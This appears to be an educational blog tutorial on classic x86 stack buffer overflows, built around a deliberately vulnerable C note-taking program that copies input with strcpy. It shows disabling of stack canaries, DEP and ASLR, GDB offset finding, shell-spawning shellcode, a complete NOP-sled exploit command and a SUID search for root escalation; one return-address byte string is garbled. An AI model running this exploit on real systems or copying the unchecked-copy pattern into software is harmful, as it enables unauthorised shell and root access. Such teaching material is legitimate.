Buffer overflows are as old as the world itself. Being a software engineer myself, I’ve always been interested in identifying weaknesses in code. In my early days, I also wrote a lot of C code. Buffer overflows were one of the first topics I really dug into because C is infamous for not being memory safe, and today is the day I’ll share it with the world.
Buffer overflow
Buffer overflow is a type of vulnerability that relates to memory allocation. Whenever we declare a local array inside a function, a fixed-size buffer is allocated on the stack (the region of memory that holds a function’s local variables and return information). Let’s create a 400-byte buffer (a char array holding 400 elements) and visualize how the stack actually looks.
void createBuffer() {
    char buffer[400];
}

int main() {
    createBuffer();
}
In the memory the buffer will look like this:
At the top we can see the ESP register, which points to the top of the stack. Then we have the buffer itself (the memory allocated in our createBuffer function), followed by the saved EBP (the base pointer of the calling function’s frame) and, most importantly, the saved EIP (Extended Instruction Pointer), which is the return address. In other words, it tells the computer which instruction to run next once the function returns. Ideally, we would like to overwrite this saved EIP value so that it points to our malicious code.
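One rough way to reason about this layout is to model the frame as a C struct. The sketch below is an idealized assumption, not what a compiler is guaranteed to produce: it ignores padding and any extra locals, and the names frame_model and bytes_before_return_addr are made up for illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Idealized model of createBuffer's stack frame on 32-bit x86.
 * Assumption: no padding and no other locals; a real compiler may add both. */
struct frame_model {
    char     buffer[400];   /* local array, at the lowest addresses */
    uint32_t saved_ebp;     /* caller's frame pointer */
    uint32_t return_addr;   /* saved EIP: where execution resumes */
};

/* Number of bytes an input must write before it reaches the return address. */
size_t bytes_before_return_addr(void) {
    return offsetof(struct frame_model, return_addr);
}
```

In this model the return address starts 404 bytes past the beginning of the buffer. A real binary may differ, so the actual distance is best measured with a debugger.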
Note++ (Vulnerable app)
There is a brand new app named Note++ on the market. This program lets you take notes in entirely new ways. Unbeknownst to the general public, it contains a major flaw that makes it quite vulnerable to exploitation. Can you find the security hole?
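#include <stdio.h>
#include <string.h>

void createNote(char *note) {
    char buffer[400];
    /* Copy the note into a local buffer. */
    strcpy(buffer, note);
    FILE *f = fopen("note.txt", "w");
    if (f != NULL) {
        /* Write the note as plain text, not as a format string. */
        fprintf(f, "%s", buffer);
        /* Only close the file if it was actually opened. */
        fclose(f);
    }
}

int main(int argc, char* argv[]) {
    if (argc == 2) {
        createNote(argv[1]);
    }
    return 0;
}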
The strcpy call, which copies the note content into the buffer, is the part of the code that raises red flags. The problem with strcpy() is that it does not check the size of its input. If the note is 400 characters or longer, strcpy writes past the end of the buffer (it also copies the terminating null byte), which results in a buffer overflow and potentially a segmentation fault.
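For contrast, here is a minimal sketch of what a bounds-checked copy could look like. It is not part of Note++; the function name copy_note and its return convention are assumptions made for this example.

```c
#include <stddef.h>
#include <string.h>

/* Copies src into dst only if it fits, including the terminating '\0'.
 * Returns 0 on success, -1 if the note is too long (dst is left empty). */
int copy_note(char *dst, size_t dst_size, const char *src) {
    if (dst_size == 0) {
        return -1;
    }
    size_t len = strlen(src);
    if (len >= dst_size) {      /* no room for the text plus '\0' */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);  /* len + 1 also copies the '\0' */
    return 0;
}
```

Calling copy_note(buffer, sizeof buffer, note) instead of strcpy(buffer, note) would reject any note that does not fit into the 400-byte buffer instead of overflowing it.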
Buffer overflow protections
If you compile C or C++ code with gcc on a modern Linux system, several protections are enabled by default, and we have to disable them for this demonstration:
- SC (Stack Canary) – a secret value placed on the stack between the local variables and the return address. This value changes every time we run the program. Before a function returns, the value is checked, and if it appears to be modified, the program exits.
- DEP (Data Execution Prevention) – prevents the system from executing code located in memory regions that should not contain executable instructions, such as the stack
- ASLR (Address Space Layout Randomization) – randomizes where the stack, heap and libraries are placed in memory, so the addresses change every time we run the program
Disabling SC and DEP can be achieved by turning off the stack protector and marking the stack as executable during compilation (on a 64-bit system you would typically also need -m32 to get the 32-bit layout with ESP, EBP and EIP described here):
-fno-stack-protector -z execstack
If we want to temporarily disable ASLR (this requires root privileges), we can use this command:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
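To make the stack canary idea from the list above more concrete, here is a small simulation. It is only a sketch: real canaries are inserted by the compiler and checked before the function returns, while this example uses a made-up struct (guarded_frame), an arbitrary 16-byte buffer and a caller-supplied secret.

```c
#include <stdint.h>
#include <string.h>

/* Simulated frame: a small buffer followed directly by a guard value. */
struct guarded_frame {
    char     buffer[16];
    uint32_t canary;
};

/* Writes len bytes into the frame starting at the buffer, the way an
 * unchecked copy would, then reports whether the canary survived.
 * The write is clamped to the struct so the simulation stays in bounds.
 * Returns 1 if the canary is intact, 0 if it was overwritten. */
int canary_intact_after_write(const void *data, size_t len, uint32_t secret) {
    struct guarded_frame frame;
    memset(&frame, 0, sizeof frame);
    frame.canary = secret;

    if (len > sizeof frame) {
        len = sizeof frame;
    }
    memcpy(&frame, data, len);  /* bytes past the 16th spill into canary */

    return frame.canary == secret;
}
```

A write of up to 16 bytes leaves the canary untouched, while anything longer changes it, which is the condition a protected program would detect before returning.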
Where is Waldo? I mean… where is EIP?
Great! We now have a vulnerable application on our system. The next step is to find the location of the saved EIP, because it doesn’t have to be located right after the buffer and EBP (the compiler may add padding). For this we can use GDB, a debugger used mainly for C and C++ code. I will use Python to create inputs that help me map the stack (the commands use Python 2 print syntax). My goal is to send an input (payload) whose length is exactly buffer + EBP + EIP, so that its last four bytes land on the return address. When that happens, the program should crash with a segmentation fault while trying to jump to the address formed by those four bytes.
gdb -q --args ./noteplusplus `python -c 'print "A" * 412 + "BCDE"'`
After some testing, I discovered that my payload has to be 416 bytes long, with the buffer and EBP taking 412 bytes and EIP occupying the last four bytes. The reason for appending the string "BCDE" is its hexadecimal representation: it translates to the values 42, 43, 44 and 45, which we can easily spot in the debugger. To better visualize the stack, you can use the x/32z $esp command within the debugger, which displays 32 words of memory as zero-padded hexadecimal, starting at the address held in ESP (the top of the stack). Hit the Enter key to keep scrolling until you see a sequence of 0x41414141, which represents the letters A. After a while, you should see a single cell containing the value 0x45444342 (in little endian, this value represents the BCDE string).
0xffffac50: 0x41414141 0x41414141 0x41414141 0x45444342
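The byte order can be checked with a few lines of C. This is a small illustrative helper (the name to_little_endian is my own) that splits a 32-bit value into the four bytes x86 stores in memory, least significant byte first.

```c
#include <stdint.h>

/* Stores a 32-bit value as four bytes, least significant byte first
 * (the order x86 uses in memory). */
void to_little_endian(uint32_t value, unsigned char out[4]) {
    out[0] = (unsigned char)(value & 0xff);
    out[1] = (unsigned char)((value >> 8) & 0xff);
    out[2] = (unsigned char)((value >> 16) & 0xff);
    out[3] = (unsigned char)((value >> 24) & 0xff);
}
```

Passing 0x45444342 yields the bytes 0x42, 0x43, 0x44, 0x45, which are the ASCII codes of B, C, D and E in the order they were typed.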
Shall we use Shellcodes?
In the previous example we filled the stack with arbitrary values. What if we used some (perhaps harmful) instructions instead? This is where shellcode enters the picture. Shellcode is a small piece of machine code that is frequently used as the payload of an exploit. There is a large database of shellcodes for educational purposes available at shell-storm.org. I am going to select one that opens a shell.
\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
At the end of our shellcode we have to append the return address, which must point to a place in our stack. We would like the address to point at the beginning of the stack (the address you got by calling x/32z $esp in gdb). This return address, written in reverse (little-endian) byte order, will overwrite the saved EIP value. For example, an address such as 0xffffac50 would be written as \x50\xac\xff\xff.
\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh + \50\x4\xff\xff
Setting up the attack string
We have all the necessary parts set up. The only thing remaining is to set up the attack string which will be passed as a parameter to our vulnerable application. To create an attack string, we have to do some calculations.
- We know that the buffer and EBP together take up 412 bytes
- Our shellcode has 53 bytes
- 412 – 53 = 359 which means that we have to fill the buffer with 359 bytes of arbitrary nonsense
As the “arbitrary nonsense” we can use the NOP (no operation) instruction, which has the hexadecimal value 0x90 on Intel x86 architectures (it is different on other architectures). If the return address lands anywhere in this run of NOPs, execution simply slides forward into the shellcode. With this knowledge we can call our program like this:
./noteplusplus `python -c 'print "\x90" * 359 + "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" + "\50\x4\xff\xff"'`
This opens a shell through the vulnerable Note++ application.
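The arithmetic behind the attack string can also be written down as a short C sketch. The names OFFSET_TO_RET, PAYLOAD_LEN and build_payload are made up for this example, the 412-byte offset is the value measured in GDB earlier and will differ on other builds, and the code bytes and return address are simply whatever the caller passes in.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define OFFSET_TO_RET 412                  /* buffer + saved EBP, as measured in GDB */
#define PAYLOAD_LEN   (OFFSET_TO_RET + 4)  /* plus the 4-byte return address */

/* Fills out with NOP padding, then the code bytes, then the return
 * address in little-endian order.
 * Returns the number of NOP bytes written, or -1 if the code does not fit. */
int build_payload(unsigned char out[PAYLOAD_LEN],
                  const unsigned char *code, size_t code_len,
                  uint32_t ret_addr) {
    if (code_len > OFFSET_TO_RET) {
        return -1;
    }
    size_t nops = OFFSET_TO_RET - code_len;
    memset(out, 0x90, nops);                /* NOP padding */
    memcpy(out + nops, code, code_len);     /* code sits right before the address */
    for (int i = 0; i < 4; i++) {
        out[OFFSET_TO_RET + i] = (unsigned char)((ret_addr >> (8 * i)) & 0xff);
    }
    return (int)nops;
}
```

With 53 bytes of code the function writes 359 NOP bytes, matching the calculation above, and the total length comes out at 416 bytes.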
Mismanaged SUID can lead to troubles
Sometimes careless system administrators compile and install applications while logged in as root. As a result, the binary may end up owned by root with the SUID (set user ID) bit set, often without anyone noticing. In that case the program runs with root permissions, and so does the shell we launch from it. You can find all executables that have the SUID bit set by running this command:
find / -perm -u=s -type f 2>/dev/null
The 2>/dev/null redirection discards the error messages produced during the search.
Is this still viable?
Well, the classic stack buffer overflow is an introductory type of exploit, and on modern systems the protections described above stop it in its basic form. It is nevertheless useful to understand this topic, as it paves the way to learning more advanced exploits. I also believe every programmer should understand how memory works.
If you have read so far, you might want to follow me here on Hashnode. Feel free to connect with me over at LinkedIn or Mastodon.